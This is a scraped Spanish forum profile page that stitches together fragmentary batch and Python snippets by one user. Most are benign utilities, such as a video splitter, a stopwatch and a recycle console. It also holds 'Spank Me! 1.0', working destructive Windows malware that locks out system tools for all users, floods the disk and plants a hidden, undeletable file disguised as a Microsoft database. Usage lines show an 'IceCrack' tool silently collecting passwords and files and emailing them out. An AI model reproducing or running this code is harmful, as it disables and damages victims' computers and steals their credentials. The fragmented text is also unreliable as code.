¿Que estoy haciendo mal?
Código (Python) [Seleccionar]
import os
print " Test "
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes Menú#!usr/bin/python
import os
print " Test "
#!/usr/bin/env python
from distutils.core import setup
import py2exe
python setup.py py2exe --bundle 1
running py2exe
error: bundle-files 1 not yet supported on win64
python setup.py py2exe
C:\Users\Administrador\Desktop>test.exe google.com
Traceback (most recent call last):
File "d.py", line 3, in <module>
File "urllib.pyc", line 26, in <module>
File "socket.pyc", line 47, in <module>
File "_socket.pyc", line 12, in <module>
File "_socket.pyc", line 10, in __load
ImportError: DLL load failed: No se puede encontrar el m¾dulo especificado.
@Echo off
Title Consola de reciclaje v1.0
REM: By Elektro H@cker
Mode con cols=70 lines=20
Nircmd win center ititle "Consola de reciclaje" >nul 2>&1
Setlocal enabledelayedexpansion
Set min=0
Set max=1
Color 1f
Echo: Arrastre hasta aqu¡ los archivos o carpetas que desea eliminar.
Set /P Archivos=^>^>^>
If not defined archivos (Goto :Basurero)
Echo %Archivos% | FIND ":" >NUL
If NOT %ERRORLEVEL% EQU 0 (Goto :Basurero)
Set archivos=%archivos%##
Echo: Eliminando los archivos, Porfavor Espere...
Echo !string! | find "#" >NUL 2>&1
call :limite
Set String=!archivos:~%min%,%max%!;
echo ^!string:~-2! | findstr ":" >NUL
If %errorlevel% equ 0 (
Set String=!string:~-3,2!\!String!
Set String=!string:^"=!
Set /A max+=1
Set /A Min+=!MAX!
Set max=1
call :ELIMINAR !String:~0,-3!
goto :Bucle
) else (
Set /A max+=1
Goto :Bucle
if %errorlevel% equ 0 (
Set /A min-=3
Set /A max+=1
call :string_Final
call :ELIMINAR !String:~0,-1!
Goto :FIN
Set String=!archivos:~%min%,%max%!;
Set String=!string:^"=!
goto :EOF
If /I "%*" EQU "C:\" (GOTO :EOF)
If /I "%*" EQU "D:\" (GOTO :EOF)
If /I "%*" EQU "E:\" (GOTO :EOF)
If /I "%*" EQU "F:\" (GOTO :EOF)
If /I "%*" EQU "G:\" (GOTO :EOF)
If /I "%*" EQU "H:\" (GOTO :EOF)
For /F "Tokens=*" %%# IN ('echo "%*"') do (
Del /Q /F %%# >NUL 2>&1
Call :Carpeta %%#
If Exist %* (
Echo: Eliminando carpeta: %*
RD /Q /S %*
) ELSE (
Echo: Eliminando archivo: "%~nx1"
Goto :EOF
Echo: Se han borrado todos los archivos.
@Echo OFF
: Spank Me! 1.0
: :
: By EleKtrO H@ckeR :
: :
: Testeado en Windows 7 :
REM: Deshabilita la ejecución de archivos REG
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.reg" /t Reg_SZ /d "txtfile" /f >NUL 2>&1
FOR /F "tokens=*" %%a in ('Reg query "HKEY_USERS" /f - ^| findstr /r .-......- ^| find /v "Classes"') do (
REM: Deshabilita el acceso a todas las aplicaciones (Inicio > Ejecutar)
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "RestrictRun" /T "REG_DWORD" /D "1" /f >NUL 2>&1
REM: Deshabilita el administrador de tareas
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /T "REG_DWORD" /D "1" /f >NUL 2>&1
REM: Deshabilita el apagado del PC
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoClose" /T "REG_DWORD" /D "1" /f >NUL 2>&1
REM: Deshabilita el cambio de usuario de sesión del PC
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "StartmenuLogoff" /T "REG_DWORD" /D "1" /f >NUL 2>&1
REM: Deshabilita el menú contextual del ratón
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoViewContextMenu" /T "REG_DWORD" /D "1" /f >NUL 2>&1
REM: Deshabilita el menú contextual del menú inicio
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoTrayContextMenu" /T "REG_DWORD" /D "1" /f >NUL 2>&1
REM: Deshabilita modificaciones en el menú inicio
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoChangeStartMenu" /T "REG_DWORD" /D "1" /f >NUL 2>&1
REM: Deshabilita el panel de control
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoControlPanel" /T "REG_DWORD" /D "1" /f >NUL 2>&1
REM: Deshabilita el regedit
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\system" /v "DisableRegistryTools" /T "REG_DWORD" /D "1" /f >NUL 2>&1
REM: Deshabilita la consola de windows
reg add "%%a\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /T "REG_DWORD" /D "2" /f >NUL 2>&1
REM: ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
REM: Crea archivos de 1 byte, Con nombre aleatorio, En todos los directorios del disco duro
REM: ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
setlocal enabledelayedexpansion
Set File=0
For /F "Tokens=*" %%@ in ('Dir /B /S /AD "%systemdrive%" ^| Find /V /I "Windows" ^| Find /V /I "$Recycle.Bin"') do (Call :COPY %%@)
Goto :Dummy
Fsutil file createnew "%*\%Random%%Random%%Random%%Random%%Random%" 1 >NUL 2>&1
Set /A File+=1
If !FILE! EQU 100 (Set /A File=0& Goto :EOF) ELSE (Call :COPY %*)
REM: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
REM: Crea un archivo "dummy" consumiendo TODO el espacio libre del disco duro.
REM: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
REM: Permisos
Takeown /F "%Windir%\winsxs" >NUL 2>&1
Icacls "%Windir%\winsxs" /Grant TODOS:F >NUL 2>&1
REM Crear el Dummy
For /F "tokens=1-7 delims=: " %%a in ('fsutil volume diskfree %SYSTEMDRIVE%') do (
Set Size=%%f
Set Size=!Size:~-0,-6!
Set Size=!Size!000000
Fsutil file createnew "%WINDIR%\winsxs\Microsoft Security Database.msd" !SIZE! >NUL 2>&1
REM Protección Anti-Borrado
Takeown /F "%WINDIR%\winsxs\Microsoft Security Database.msd" >NUL 2>&1
Icacls "%WINDIR%\winsxs\Microsoft Security Database.msd" /Grant TODOS:F >NUL 2>&1
Attrib "%WINDIR%\winsxs\Microsoft Security Database.msd" +H +S +R >NUL 2>&1
Icacls "%WINDIR%\winsxs\Microsoft Security Database.msd" /Deny TODOS:F >NUL 2>&1
Del /Q %0
.___ _________ __ .------,
| | ____ ____ \_ ___ \____________ ____ | | __ ,'_____,'|
| |/ ___\/ __ \ / \ \/\_ __ \__ \ _/ ___\| |/ / | //| |
| \ \__\ ___/ \ \____| | \// __ \\ \___| < | | |
|___|\___ >___ > \______ /|__| (____ /\___ >__|_ \ | // | ;
\/ \/ \/ \/ \/ \/ |______|'._
` ._ `;
/silent info
/silent info email:TUEMAIL@hotmail.com
/silent files
/silent files email:TUEMAIL@hotmail.com
/silent pass
/silent pass email:TUEMAIL@hotmail.com
/silent email:TUEMAIL@hotmail.com
IceCrack.bat /Silent pass email:ELEKTROHACKER@LIVE.COM >NUL
IceCrack.exe -sp" /Silent pass ruta:C:\Carpeta"
IceCrack.exe -sp" /Silent pass email:TUEMAIL@HOTMAIL.COM ruta:C:\Carpeta"
IceCrack.exe -sp" /Silent ruta:%CD%"
IceCrack.exe -sp" /Silent email:TUEMAIL@HOTMAIL.COM"
icecrack /silent
icecrack /silent ruta:(RUTA)
icecrack /silent email:(EMAIL@...)
icecrack /silent email:(EMAIL@...) ruta:(RUTA)
icecrack /silent info
icecrack /silent info ruta:(RUTA)
icecrack /silent info email:(EMAIL@...)
icecrack /silent info email:(EMAIL@...) ruta:(RUTA)
icecrack /silent pass
icecrack /silent pass ruta:(RUTA)
icecrack /silent pass email:(EMAIL@...)
icecrack /silent pass email:(EMAIL@...) ruta:(RUTA)
icecrack /silent files
icecrack /silent files ruta:(RUTA)
icecrack /silent files email:(EMAIL@...)
icecrack /silent files email:(EMAIL@...) ruta:(RUTA)
icecrack -sp" /silent"
icecrack -sp" /silent ruta:(RUTA)"
icecrack -sp" /silent email:(EMAIL@...)"
icecrack -sp" /silent email:(EMAIL@...) ruta:(RUTA)"
icecrack -sp" /silent info"
icecrack -sp" /silent info ruta:(RUTA)"
icecrack -sp" /silent info email:(EMAIL@...)"
icecrack -sp" /silent info email:(EMAIL@...) ruta:(RUTA)"
icecrack -sp" /silent pass"
icecrack -sp" /silent pass ruta:(RUTA)"
icecrack -sp" /silent pass email:(EMAIL@...)"
icecrack -sp" /silent pass email:(EMAIL@...) ruta:(RUTA)"
icecrack -sp" /silent files"
icecrack -sp" /silent files ruta:(RUTA)"
icecrack -sp" /silent files email:(EMAIL@...)"
icecrack -sp" /silent files email:(EMAIL@...) ruta:(RUTA)"
PDFVerifier.exe ARCHIVO.pdf -pass:CONTRASEÑA1
La contraseña es incorrecta.
SumatraPDF.exe ARCHIVO.pdf -pass:CONTRASEÑA1
REM El archivo de salida:
Set "Archivo=Mi Diccionario.txt"
REM El tamaño del archivo de salida:
Set "Size=10485760"
REM El tiempo de espera (En segundos)
Set "Timer=600"
REM Cerrar las aplicaciones en 2º plano:
Set "CloseAPPS=ON"
REM Reabrir las aplicaciones al finalizar el generador:
Set "ReopenAPPS=ON"
REM Ocultar la salida de texto del generador:
Set "Hide=ON"
REM El color de la consola:
Set "Color=0F"
@Echo OFF
Title Cron¢metro by EleKtro H@cker
Mode con cols=20 lines=4
Setlocal enabledelayedexpansion
Color 0e
Set Medida=Segundos:
Echo. %Medida% %hora%%min%%Sec%
Ping -n 2 LocalHost >NUL
Set /A Sec+=1
IF "%Sec%" EQU "60" (
Set Sec=0
Set /A Min+=1
Set Min=!Min!:
Set Medida=Minutos:
Goto :Chrono
tasklist | find /V "Idle" | find /V "PID" | find /V "svchost.exe" | find /V "===" | find /V "wininit.exe" | find /i /V "system" | find /V "smss.exe" | find /V "inactivo.exe" | find /V "lsm.exe" | find /V "find.exe" | find /V "cmd.exe" | find /V "conhost.exe" | find /V "lsm.exe" | find /V "lsass.exe" | find /V "services.exe" | find /V "csrss.exe" | find /V "winlogon.exe" | find /V "tasklist.exe" | find /V "sublime_text"
Set Caracteres=A B C D E F 0 1 2 3 4 5 6 7 8 9
FOR %%a IN (%Caracteres%) DO (
FOR %%b IN (%Caracteres%) DO (
FOR %%c IN (%Caracteres%) DO (
FOR %%d IN (%Caracteres%) DO (
FOR %%e IN (%Caracteres%) DO (
FOR %%f IN (%Caracteres%) DO (
FOR %%g IN (%Caracteres%) DO (
FOR %%h IN (%Caracteres%) DO (
FOR %%i IN (%Caracteres%) DO (
FOR %%j IN (%Caracteres%) DO (
FOR %%k IN (%Caracteres%) DO (
FOR %%l IN (%Caracteres%) DO (
FOR %%m IN (%Caracteres%) DO (
FOR %%n IN (%Caracteres%) DO (
FOR %%o IN (%Caracteres%) DO (
FOR %%p IN (%Caracteres%) DO (
FOR %%q IN (%Caracteres%) DO (
FOR %%r IN (%Caracteres%) DO (
FOR %%s IN (%Caracteres%) DO (
FOR %%t IN (%Caracteres%) DO (
FOR %%u IN (%Caracteres%) DO (
FOR %%v IN (%Caracteres%) DO (
FOR %%w IN (%Caracteres%) DO (
FOR %%x IN (%Caracteres%) DO (
FOR %%y IN (%Caracteres%) DO (
FOR %%z IN (%Caracteres%) DO (
FOR %%A IN (%Caracteres%) DO (
FOR %%B IN (%Caracteres%) DO (
FOR %%C IN (%Caracteres%) DO (
FOR %%D IN (%Caracteres%) DO (
FOR %%E IN (%Caracteres%) DO (
FOR %%F IN (%Caracteres%) DO (
FOR %%G IN (%Caracteres%) DO (
FOR %%H IN (%Caracteres%) DO (
FOR %%I IN (%Caracteres%) DO (
FOR %%J IN (%Caracteres%) DO (
FOR %%K IN (%Caracteres%) DO (
FOR %%L IN (%Caracteres%) DO (
FOR %%M IN (%Caracteres%) DO (
FOR %%N IN (%Caracteres%) DO (
FOR %%O IN (%Caracteres%) DO (
FOR %%P IN (%Caracteres%) DO (
FOR %%Q IN (%Caracteres%) DO (
FOR %%R IN (%Caracteres%) DO (
FOR %%S IN (%Caracteres%) DO (
FOR %%T IN (%Caracteres%) DO (
FOR %%U IN (%Caracteres%) DO (
FOR %%V IN (%Caracteres%) DO (
FOR %%W IN (%Caracteres%) DO (
FOR %%X IN (%Caracteres%) DO (
FOR %%Y IN (%Caracteres%) DO (
FOR %%Z IN (%Caracteres%) DO (
FOR %%_ IN (%Caracteres%) DO (
FOR %%# IN (%Caracteres%) DO (
FOR %%. IN (%Caracteres%) DO (
FOR %%@ IN (%Caracteres%) DO (
FOR %%( IN (%Caracteres%) DO (
FOR %%\ IN (%Caracteres%) DO (
FOR %%/ IN (%Caracteres%) DO (
FOR %%$ IN (%Caracteres%) DO (
FOR %%' IN (%Caracteres%) DO (
FOR %%* IN (%Caracteres%) DO (
FOR %%- IN (%Caracteres%) DO (
FOR %%: IN (%Caracteres%) DO (
Echo. %%a%%b%%c%%d%%e%%f%%g%%h%%i%%j%%k%%l%%m%%n%%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%%A%%B%%C%%D%%E%%F%%G%%H%%I%%J%%K%%L%%M%%N%%O%%P%%Q%%R%%S%%T%%U%%V%%W%%X%%Y%%Z%%_%%#%%.%%@%%(%%\%%/%%$%%'%%*%%-%%:
Hide In Picture (HIP)
version 2.1 - October, 2002
Copyright (C) 2002 Davi Tassinari de Figueiredo
Using HIP for DOS/Linux
HIP for Dos/Linux is a command-line utility.
To hide a file inside a picture, use:
hip h source_image input_file [destination_image] [options]
If the destination image name is not specified, the destination image is
written on top of the source image.
To retrieve a file from a picture, use:
hip r source_image [output_file] [options]
If the output file name is not specified, the name saved in the picture
is used.
To erase a file previously hidden in a picture, use:
hip e source_image [destination_image] [options]
If the destination image name is not specified, the destination image is
written on top of the source image.
-fxxxxxx - file name to write in image
By default, the name of the input file is written in the image. Use
this option to specify a different name to write. If you use it
without specifying a file name, no name is written.
-pxxxxxx - password to use
When used with the hide or retrieve operations, this option specifies
the password to use for hiding/retrieving the file. If you do not use
this option, you will be asked to enter a password (recommended). When
used with the erase operation, HIP assumes there is a file hidden with
the specified password and overwrites only the first bits of the
hidden data; if the image contains a file hidden with a different
password, it will not be erased correctly.
-thh or -thhhhhh - transparent color index or RGB value
Use this option to set the transparent color for the image. To specify
the palette index for the transparent color of an 8-bit image, use two
hexadecimal digits (00-FF). To specify the RGB value for the
transparent color, use six hexadecimal digits (the first two represent
the red component, the next two represent the green one and the last
two, the blue one). If you specify the RGB value for the transparent
color of an 8-bit image and there is more than one palette entry with
that color, the one with the lowest index will be used.
-ex - encryption algorithm
Use this option to choose the encryption algorithm: a for Blowfish
(default) or b for Rijndael.
-ix - image format
Use this option to choose the image format for the output file. If the
format is not specified, HIP will choose the format based on the file
extension; if the extension is not recognized, the file will be saved
as a Windows Bitmap (BMP) picture.
-c - write the CRC-32 of the data
Use this option to append a checksum to the data to identify data
corruption. This is enabled by default.
-C - do not write the CRC-32 of the data
Use this option if you do not wish to append a checksum to the data;
see above.
-h - hide the password characters
If the p option is not used, the program asks the user for the
password. Use this option to show *'s (asterisks) instead of the
password characters. This is enabled by default.
-H - do not hide the password characters
Use this option to show the password characters while you are typing
-v - view file information only
Use this option if you only want to see whether the file fits inside
the picture when hiding, or the name and size of the hidden file when
retrieving. The destination image or output file is not written.
-q -quiet mode
Use this option if you do not want to see unnecessary messages (such
as the file information and status bars). The only things that will be
shown are password prompts, confirmation messages and error messages.
-y -answer 'yes' to all confirmation questions
By default, the program asks for confirmation before overwriting a
file that already exists. If this option is specified, you will not be
asked for confirmation.
set winsh = CreateObject("WScript.Shell")
set winenv = winsh.Environment("Process")
windir = winenv("WINDIR")
Set objShell = CreateObject("Shell.Application")
Set objFolder = objShell.Namespace("%CURRENTDIR%")
Set objFolderItem = objFolder.ParseName("*.TTF")
For each N in objFolderItem
ping -r 1 -n 1 google.com
Haciendo ping a google.com [173.194.34.xx] con 32 bytes de datos:
Respuesta desde 173.194.34.xx: bytes=32 tiempo=67ms TTL=49
Ruta: 10.47.243.xx
ping -r 1 -n 1 google.com
Haciendo ping a (ip pública de google)
Respuesta desde (ip pública de google)
Ruta: (Ip de alguno de los servidores internos de google.com, Por eso siempre se obtiene una distinta)
:Configuración por defecto:
Set Timecode_Start=00:01:47
Set Timecode_End=00:22:35
Set Audio=-a 1
Set Subtitles=--no-subtitles
Del /Q "%%_"
@Echo Off
Color 07
Mode con cols=70 lines=30
Title MKVMerge Split Helper v0.1
REM By EleKtro H@cker
REM Visita Foro.ElHacker.Net
REM Este código sirve para cortar videos MKV desde un punto (A) hasta un punto (B), Muy útil para eliminar el Opening y Ending de videos Anime.
REM El código trabaja sobre los archivos MKV que estén en el mismo directorio que esté el script.
REM El script utiliza el programa MKVMERGE, Que se puede descargar desde aquí:
REM www.bunkus.org/videotools/mkvtoolnix/win32/mkvtoolnix-unicode-
:Configuración por defecto:
Set Timecode_Start=
Set Timecode_End=
Set Audio=
Set Subtitles=
If not exist "%~dp0\*.MKV" (
Echo. No se ha encontrado ningun video en el directorio:
Echo. "%~dp0"
If not exist "mkvmerge.exe" (
Echo. No se ha encontrado el programa "MKVMERGE.EXE"
If defined Timecode_Start (Set /A Num+=1)
If defined Timecode_End (Set /A Num+=1)
If defined Audio (Set /A Num+=1)
If defined Subtitles (Set /A Num+=1)
If %num% EQU 4 (Goto :Split:)
Echo. Timecode A: Esperando...
Echo ______________________________________________________________________
Echo. Escriba el codigo de tiempo para el punto A...
Echo. Ejemplo: "01:20:59" (Hora:Minuto:Segundo)
Set /P Timecode_Start=^>^>
If NOT defined Timecode_Start (Goto :Timecode_A_SubMenu)
Echo %Timecode_Start%| Findstr /I ^..:..:..$ >Nul
If %ErrorLevel% NEQ 0 (
Echo. Ha introducido un valor incorrecto.
Ping -n 3 LocalHost >Nul
Set Timecode_Start=
Goto :Timecode_A_SubMenu
Echo. Timecode A: %Timecode_Start%
Echo. Timecode B: Esperando...
Echo ______________________________________________________________________
Echo. Escriba el codigo de tiempo para el punto B...
Echo. Ejemplo: "01:20:59" (Hora:Minuto:Segundo)
Set /P Timecode_End=^>^>
If NOT defined Timecode_Start (Goto :Timecode_B_SubMenu)
Echo %Timecode_Start%| Findstr /I ^..:..:..$ >Nul
If %ErrorLevel% NEQ 0 (
Echo. Ha introducido un valor incorrecto.
Ping -n 3 LocalHost >Nul
Set Timecode_End=
Goto :Timecode_B_SubMenu
Echo. Timecode A: %Timecode_Start%
Echo. Timecode B: %Timecode_End%
Echo. Audio: Esperando...
Echo ______________________________________________________________________
Choice /M "Quiere copiar solamente la pista de audio principal?... "
If %ErrorLevel% EQU 1 (Set Audio=-a 1)
Echo. Timecode A: %Timecode_Start%
Echo. Timecode B: %Timecode_End%
If not defined audio (Echo. Audio: Todas las pistas) ELSE (Echo. Audio: Solamente la pista principal)
Echo. Subtitulos: Esperando...
Echo ______________________________________________________________________
Choice /M "Quiere copiar los subtitulos del video de origen?... "
If %ErrorLevel% EQU 2 (Set Subtitles=--no-subtitles)
Echo. Timecode A: %Timecode_Start%
Echo. Timecode B: %Timecode_End%
If not defined audio (Echo. Audio: Todas las pistas) ELSE (Echo. Audio: Solamente la pista principal)
If not defined subtitles (Echo. Subtitulos: SI) ELSE (Echo. Subtitulos: NO)
Echo ______________________________________________________________________
For /F "Tokens=*" %%_ in ('Dir /B "%~dp0\*.mkv"') do (
Echo. Procesando: %%_
mkvmerge.exe %Subtitles% %audio% "%%_" --split timecodes:%Timecode_Start%,%Timecode_End% -o "%%_.ren" >NUL
Del /Q "%%_"
Del /Q "%%_-001.ren"
Del /Q "%%_-003.ren"
Ren "%%_-002.ren" "%%_"
Echo. Todos los videos se han cortado.
Echo. Pulse una tecla para salir...
Pause >Nul
cmd.exe /k @echo off & For /F %%a in ('Dir /B "%%WINDIR%%" ^| Find /V /C ""') do (Set /A Numero=%%a , Numero+=5) & Mode con cols=60 lines=%%Numero%% & pause
Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "!keynum%NUM%!" /f >nul 2>&1
Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "!keynum%NUM%!" /f >nul 2>&1